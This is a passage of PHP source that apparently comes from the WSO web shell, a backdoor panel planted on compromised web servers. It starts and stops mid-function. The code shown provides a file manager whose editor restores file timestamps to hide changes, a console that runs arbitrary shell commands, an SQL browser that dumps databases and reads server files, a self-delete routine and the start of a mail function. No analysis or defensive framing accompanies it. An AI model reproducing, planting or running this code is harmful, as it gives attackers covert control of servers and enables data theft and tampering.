      case 'paste':
        if($_COOKIE['act'] == 'copy') {
          function copy_paste($c,$s,$d){
            if(is_dir($c.$s)){
              mkdir($d.$s);
              $h = @opendir($c.$s);
              while (($f = @readdir($h)) !== false)
                if (($f != ".") and ($f != ".."))
                  copy_paste($c.$s.'/',$f, $d.$s.'/');
            } elseif(is_file($c.$s))
              @copy($c.$s, $d.$s);
          }
          foreach($_COOKIE['f'] as $f)
            copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
        } elseif($_COOKIE['act'] == 'move') {
          function move_paste($c,$s,$d){
            if(is_dir($c.$s)){
              mkdir($d.$s);
              $h = @opendir($c.$s);
              while (($f = @readdir($h)) !== false)
                if (($f != ".") and ($f != ".."))
                  copy_paste($c.$s.'/',$f, $d.$s.'/');
            } elseif(@is_file($c.$s))
              @copy($c.$s, $d.$s);
          }
          foreach($_COOKIE['f'] as $f)
            @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
        } elseif($_COOKIE['act'] == 'zip') {
          if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        if ($zip->open($_POST['p2'], 1)) {
                            chdir($_COOKIE['c']);
                            foreach($_COOKIE['f'] as $f) {
                                if($f == '..')
                                    continue;
                                if(@is_file($_COOKIE['c'].$f))
                                    $zip->addFile($_COOKIE['c'].$f, $f);
                                elseif(@is_dir($_COOKIE['c'].$f)) {
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
                                    foreach ($iterator as $key=>$value) {
                                        $zip->addFile(realpath($key), $key);
                                    }
                                }
                            }
                            chdir($GLOBALS['cwd']);
                            $zip->close();
                        }
                    }
        } elseif($_COOKIE['act'] == 'unzip') {
          if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        foreach($_COOKIE['f'] as $f) {
                            if($zip->open($_COOKIE['c'].$f)) {
                                $zip->extractTo($GLOBALS['cwd']);
                                $zip->close();
                            }
                        }
                    }
        } elseif($_COOKIE['act'] == 'tar') {
                    chdir($_COOKIE['c']);
                    $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
                    wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
                    chdir($GLOBALS['cwd']);
        }
        unset($_COOKIE['f']);
                setcookie('f', '', time() - 3600);
        break;
      default:
                if(!empty($_POST['p1'])) {
          WSOsetcookie('act', $_POST['p1']);
          WSOsetcookie('f', serialize(@$_POST['f']));
          WSOsetcookie('c', @$_POST['c']);
        }
        break;
    }
  }
    wsoHeader();
  echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
  $dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  if($dirContent === false) {  echo 'Can\'t open this folder!';wsoFooter(); return; }
  global $sort;
  $sort = array('name', 1);
  if(!empty($_POST['p1'])) {
    if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
      $sort = array($match[1], (int)$match[2]);
  }
echo "<script>
  function sa() {
    for(i=0;i<d.files.elements.length;i++)
      if(d.files.elements[i].type == 'checkbox')
        d.files.elements[i].checked = d.files.elements[0].checked;
  }
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
  $dirs = $files = array();
  $n = count($dirContent);
  for($i=0;$i<$n;$i++) {
    $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
    $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
    $tmp = array('name' => $dirContent[$i],
           'path' => $GLOBALS['cwd'].$dirContent[$i],
           'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
           'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
           'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
           'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
           'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
          );
    if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
      $files[] = array_merge($tmp, array('type' => 'file'));
    elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
      $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
    elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i]))
      $dirs[] = array_merge($tmp, array('type' => 'dir'));
  }
  $GLOBALS['sort'] = $sort;
  function wsoCmp($a, $b) {
    if($GLOBALS['sort'][0] != 'size')
      return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
    else
      return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  }
  usort($files, "wsoCmp");
  usort($dirs, "wsoCmp");
  $files = array_merge($dirs, $files);
  $l = 0;
  foreach($files as $f) {
    echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
      .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
    $l = $l?0:1;
  }
  echo "<tr><td colspan=7>
  <input type=hidden name=a value='FilesMan'>
  <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
  <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
  <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
    if(class_exists('ZipArchive'))
        echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
    echo "<option value='tar'>Compress (tar.gz)</option>";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
        echo "<option value='paste'>Paste / Compress</option>";
    echo "</select>&nbsp;";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
        echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;";
    echo "<input type='submit' value='>>'></td></tr></form></table></div>";
  wsoFooter();
}

function actionFilesTools() {
  if( isset($_POST['p1']) )
    $_POST['p1'] = urldecode($_POST['p1']);
  if(@$_POST['p2']=='download') {
    if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
      ob_start("ob_gzhandler", 4096);
      header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
      if (function_exists("mime_content_type")) {
        $type = @mime_content_type($_POST['p1']);
        header("Content-Type: " . $type);
      } else
                header("Content-Type: application/octet-stream");
      $fp = @fopen($_POST['p1'], "r");
      if($fp) {
        while(!@feof($fp))
          echo @fread($fp, 1024);
        fclose($fp);
      }
    }exit;
  }
  if( @$_POST['p2'] == 'mkfile' ) {
    if(!file_exists($_POST['p1'])) {
      $fp = @fopen($_POST['p1'], 'w');
      if($fp) {
        $_POST['p2'] = "edit";
        fclose($fp);
      }
    }
  }
  wsoHeader();
  echo '<h1>File tools</h1><div class=content>';
  if( !file_exists(@$_POST['p1']) ) {
    echo 'File not exists';
    wsoFooter();
    return;
  }
  $uid = @posix_getpwuid(@fileowner($_POST['p1']));
  if(!$uid) {
    $uid['name'] = @fileowner($_POST['p1']);
    $gid['name'] = @filegroup($_POST['p1']);
  } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
  echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
  echo '<span>Change time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
  if( empty($_POST['p2']) )
    $_POST['p2'] = 'view';
  if( is_file($_POST['p1']) )
    $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
  else
    $m = array('Chmod', 'Rename', 'Touch');
  foreach($m as $v)
    echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
  echo '<br><br>';
  switch($_POST['p2']) {
    case 'view':
      echo '<pre class=ml1>';
      $fp = @fopen($_POST['p1'], 'r');
      if($fp) {
        while( !@feof($fp) )
          echo htmlspecialchars(@fread($fp, 1024));
        @fclose($fp);
      }
      echo '</pre>';
      break;
    case 'highlight':
      if( @is_readable($_POST['p1']) ) {
        echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
        $code = @highlight_file($_POST['p1'],true);
        echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
      }
      break;
    case 'chmod':
      if( !empty($_POST['p3']) ) {
        $perms = 0;
        for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
          $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
        if(!@chmod($_POST['p1'], $perms))
          echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
      }
      clearstatcache();
      echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
      break;
    case 'edit':
      if( !is_writable($_POST['p1'])) {
        echo 'File isn\'t writeable';
        break;
      }
      if( !empty($_POST['p3']) ) {
        $time = @filemtime($_POST['p1']);
        $_POST['p3'] = substr($_POST['p3'],1);
        $fp = @fopen($_POST['p1'],"w");
        if($fp) {
          @fwrite($fp,$_POST['p3']);
          @fclose($fp);
          echo 'Saved!<br><script>p3_="";</script>';
          @touch($_POST['p1'],$time,$time);
        }
      }
      echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
      $fp = @fopen($_POST['p1'], 'r');
      if($fp) {
        while( !@feof($fp) )
          echo htmlspecialchars(@fread($fp, 1024));
        @fclose($fp);
      }
      echo '</textarea><input type=submit value=">>"></form>';
      break;
    case 'hexdump':
      $c = @file_get_contents($_POST['p1']);
      $n = 0;
      $h = array('00000000<br>','','');
      $len = strlen($c);
      for ($i=0; $i<$len; ++$i) {
        $h[1] .= sprintf('%02X',ord($c[$i])).' ';
        switch ( ord($c[$i]) ) {
          case 0:  $h[2] .= ' '; break;
          case 9:  $h[2] .= ' '; break;
          case 10: $h[2] .= ' '; break;
          case 13: $h[2] .= ' '; break;
          default: $h[2] .= $c[$i]; break;
        }
        $n++;
        if ($n == 32) {
          $n = 0;
          if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
          $h[1] .= '<br>';
          $h[2] .= "\n";
        }
       }
      echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
      break;
    case 'rename':
      if( !empty($_POST['p3']) ) {
        if(!@rename($_POST['p1'], $_POST['p3']))
          echo 'Can\'t rename!<br>';
        else
          die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
      }
      echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
      break;
    case 'touch':
      if( !empty($_POST['p3']) ) {
        $time = strtotime($_POST['p3']);
        if($time) {
          if(!touch($_POST['p1'],$time,$time))
            echo 'Fail!';
          else
            echo 'Touched!';
        } else echo 'Bad time format!';
      }
      clearstatcache();
      echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
      break;
  }
  echo '</div>';
  wsoFooter();
}

function actionConsole() {
    if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
        $_POST['p1'] .= ' 2>&1';
    } elseif(!empty($_POST['p1']))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);

  if(isset($_POST['ajax'])) {
    WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
    ob_start();
    echo "d.cf.cmd.value='';\n";
    $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
    if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))  {
      if(@chdir($match[1])) {
        $GLOBALS['cwd'] = @getcwd();
        echo "c_='".$GLOBALS['cwd']."';";
      }
    }
    echo "d.cf.output.value+='".$temp."';";
    echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
    $temp = ob_get_clean();
    echo strlen($temp), "\n", $temp;
    exit;
  }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
    WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
  wsoHeader();
    echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
  var n = (window.Event) ? e.which : e.keyCode;
  if(n == 38) {
    cur--;
    if(cur>=0)
      document.cf.cmd.value = cmds[cur];
    else
      cur++;
  } else if(n == 40) {
    cur++;
    if(cur < cmds.length)
      document.cf.cmd.value = cmds[cur];
    else
      cur--;
  }
}
function add(cmd) {
  cmds.pop();
  cmds.push(cmd);
  cmds.push('');
  cur = cmds.length-1;
}
</script>";
  echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;">';
  echo '<input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
  if(!empty($_POST['p1'])) {
    echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
  }
  echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
  echo '</form></div><script>d.cf.cmd.focus();</script>';
  wsoFooter();
}

function actionLogout() {
    setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
  die('bye!');
}

function actionSelfRemove() {

  if($_POST['p1'] == 'yes')
    if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
      die('Shell has been removed');
    else
      echo 'unlink error!';
    if($_POST['p1'] != 'yes')
        wsoHeader();
  echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
  wsoFooter();
}

function actionSql() {
  class DbClass {
    var $type;
    var $link;
    var $res;
    function DbClass($type)  {
      $this->type = $type;
    }
    function connect($host, $user, $pass, $dbname){
      switch($this->type)  {
        case 'mysql':
          if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
          break;
        case 'pgsql':
          $host = explode(':', $host);
          if(!$host[1]) $host[1]=5432;
          if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
          break;
      }
      return false;
    }
    function selectdb($db) {
      switch($this->type)  {
        case 'mysql':
          if (@mysql_select_db($db))return true;
          break;
      }
      return false;
    }
    function query($str) {
      switch($this->type) {
        case 'mysql':
          return $this->res = @mysql_query($str);
          break;
        case 'pgsql':
          return $this->res = @pg_query($this->link,$str);
          break;
      }
      return false;
    }
    function fetch() {
      $res = func_num_args()?func_get_arg(0):$this->res;
      switch($this->type)  {
        case 'mysql':
          return @mysql_fetch_assoc($res);
          break;
        case 'pgsql':
          return @pg_fetch_assoc($res);
          break;
      }
      return false;
    }
    function listDbs() {
      switch($this->type)  {
        case 'mysql':
                        return $this->query("SHOW databases");
        break;
        case 'pgsql':
          return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
        break;
      }
      return false;
    }
    function listTables() {
      switch($this->type)  {
        case 'mysql':
          return $this->res = $this->query('SHOW TABLES');
        break;
        case 'pgsql':
          return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
        break;
      }
      return false;
    }
    function error() {
      switch($this->type)  {
        case 'mysql':
          return @mysql_error();
        break;
        case 'pgsql':
          return @pg_last_error();
        break;
      }
      return false;
    }
    function setCharset($str) {
      switch($this->type)  {
        case 'mysql':
          if(function_exists('mysql_set_charset'))
            return @mysql_set_charset($str, $this->link);
          else
            $this->query('SET CHARSET '.$str);
          break;
        case 'pgsql':
          return @pg_set_client_encoding($this->link, $str);
          break;
      }
      return false;
    }
    function loadFile($str) {
      switch($this->type)  {
        case 'mysql':
          return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
        break;
        case 'pgsql':
          $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
          $r=array();
          while($i=$this->fetch())
            $r[] = $i['file'];
          $this->query('drop table wso2');
          return array('file'=>implode("\n",$r));
        break;
      }
      return false;
    }
    function dump($table, $fp = false) {
      switch($this->type)  {
        case 'mysql':
          $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
          $create = mysql_fetch_array($res);
          $sql = $create[1].";\n";
                    if($fp) fwrite($fp, $sql); else echo($sql);
          $this->query('SELECT * FROM `'.$table.'`');
                    $i = 0;
                    $head = true;
          while($item = $this->fetch()) {
                        $sql = '';
                        if($i % 1000 == 0) {
                            $head = true;
                            $sql = ";\n\n";
                        }

            $columns = array();
            foreach($item as $k=>$v) {
                            if($v === null)
                                $item[$k] = "NULL";
                            elseif(is_int($v))
                                $item[$k] = $v;
                            else
                                $item[$k] = "'".@mysql_real_escape_string($v)."'";
              $columns[] = "`".$k."`";
            }
                        if($head) {
                            $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
                            $head = false;
                        } else
                            $sql .= "\n\t,(".implode(", ", $item).')';
                        if($fp) fwrite($fp, $sql); else echo($sql);
                        $i++;
          }
                    if(!$head)
                        if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
        break;
        case 'pgsql':
          $this->query('SELECT * FROM '.$table);
          while($item = $this->fetch()) {
            $columns = array();
            foreach($item as $k=>$v) {
              $item[$k] = "'".addslashes($v)."'";
              $columns[] = $k;
            }
                        $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
                        if($fp) fwrite($fp, $sql); else echo($sql);
          }
        break;
      }
      return false;
    }
  };
  $db = new DbClass($_POST['type']);
  if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) {
    $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
    $db->selectdb($_POST['sql_base']);
        switch($_POST['charset']) {
            case "Windows-1251": $db->setCharset('cp1251'); break;
            case "UTF-8": $db->setCharset('utf8'); break;
            case "KOI8-R": $db->setCharset('koi8r'); break;
            case "KOI8-U": $db->setCharset('koi8u'); break;
            case "cp866": $db->setCharset('cp866'); break;
        }
        if(empty($_POST['file'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=dump.sql");
            header("Content-Type: text/plain");
            foreach($_POST['tbl'] as $v)
        $db->dump($v);
            exit;
        } elseif($fp = @fopen($_POST['file'], 'w')) {
            foreach($_POST['tbl'] as $v)
                $db->dump($v, $fp);
            fclose($fp);
            unset($_POST['p2']);
        } else
            die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
  }
  wsoHeader();
  echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
<td><select name='type'><option value='mysql' ";
    if(@$_POST['type']=='mysql')echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if(@$_POST['type']=='pgsql')echo 'selected';
echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
<td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
<td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>";
  $tmp = "<input type=text name=sql_base value=''>";
  if(isset($_POST['sql_host'])){
    if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
      switch($_POST['charset']) {
        case "Windows-1251": $db->setCharset('cp1251'); break;
        case "UTF-8": $db->setCharset('utf8'); break;
        case "KOI8-R": $db->setCharset('koi8r'); break;
        case "KOI8-U": $db->setCharset('koi8u'); break;
        case "cp866": $db->setCharset('cp866'); break;
      }
      $db->listDbs();
      echo "<select name=sql_base><option value=''></option>";
      while($item = $db->fetch()) {
        list($key, $value) = each($item);
        echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
      }
      echo '</select>';
    }
    else echo $tmp;
  }else
    echo $tmp;
  echo "</td>
        <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
      </tr>
    </table>
    <script>
            s_db='".@addslashes($_POST['sql_base'])."';
            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
                    if(f.p1) f.p1.value='';
                    if(f.p2) f.p2.value='';
                    if(f.p3) f.p3.value='';
                }
            }
      function st(t,l) {
        d.sf.p1.value = 'select';
        d.sf.p2.value = t;
                if(l && d.sf.p3) d.sf.p3.value = l;
        d.sf.submit();
      }
      function is() {
        for(i=0;i<d.sf.elements['tbl[]'].length;++i)
          d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
      }
    </script>";
  if(isset($db) && $db->link){
    echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
      if(!empty($_POST['sql_base'])){
        $db->selectdb($_POST['sql_base']);
        echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
        $tbls_res = $db->listTables();
        while($item = $db->fetch($tbls_res)) {
          list($key, $value) = each($item);
                    if(!empty($_POST['sql_count']))
                        $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
          $value = htmlspecialchars($value);
          echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
        }
        echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
        if(@$_POST['p1'] == 'select') {
          $_POST['p1'] = 'query';
                    $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
          $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
          $num = $db->fetch();
          $pages = ceil($num['n'] / 30);
                    echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
                    echo " of $pages";
                    if($_POST['p3'] > 1)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";
                    if($_POST['p3'] < $pages)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";
                    $_POST['p3']--;
          if($_POST['type']=='pgsql')
            $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
          else
            $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
          echo "<br><br>";
        }
        if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
          $db->query(@$_POST['p2']);
          if($db->res !== false) {
            $title = false;
            echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
            $line = 1;
            while($item = $db->fetch())  {
              if(!$title)  {
                echo '<tr>';
                foreach($item as $key => $value)
                  echo '<th>'.$key.'</th>';
                reset($item);
                $title=true;
                echo '</tr><tr>';
                $line = 2;
              }
              echo '<tr class="l'.$line.'">';
              $line = $line==1?2:1;
              foreach($item as $key => $value) {
                if($value == null)
                  echo '<td><i>null</i></td>';
                else
                  echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
              }
              echo '</tr>';
            }
            echo '</table>';
          } else {
            echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
          }
        }
        echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
                if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
                    echo htmlspecialchars($_POST['p2']);
                echo "</textarea><br/><input type=submit value='Execute'>";
        echo "</td></tr>";
      }
      echo "</table></form><br/>";
            if($_POST['type']=='mysql') {
                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
                if($db->fetch())
                    echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
            }
      if(@$_POST['p1'] == 'loadfile') {
        $file = $db->loadFile($_POST['p2']);
        echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
      }
  } else {
        echo htmlspecialchars($db->error());
    }
  echo '</div>';
  wsoFooter();
}

function actionMailTest() {
  function get_base_url()
  {
    $myurl = 'http://'.$_SERVER%5B'SERVER_NAME'%5D.$_SERVER%5B'REQUEST_URI'%5D;
    $p = parse_url($myurl);
    $myname = explode("/", $p['path']);
    $myname = $myname[count($myname) - 1];
    $base_url = $p['scheme'].'://'.$p['host'].str_replace($myname, "", $p['path']);
    return substr($base_url, 0, -1).$_SERVER['SCRIPT_NAME'];
  }
  if (!function_exists('posix_getegid')) {
      $user = @get_current_user();
  } else {
      $uid = @posix_getpwuid(posix_geteuid());
      $user = $uid['name'];
  }
  $myurl = get_base_url();
  $from = "From: Result Doc<$user@".$_SERVER['HOST_NAME'].">";
  wsoHeader();
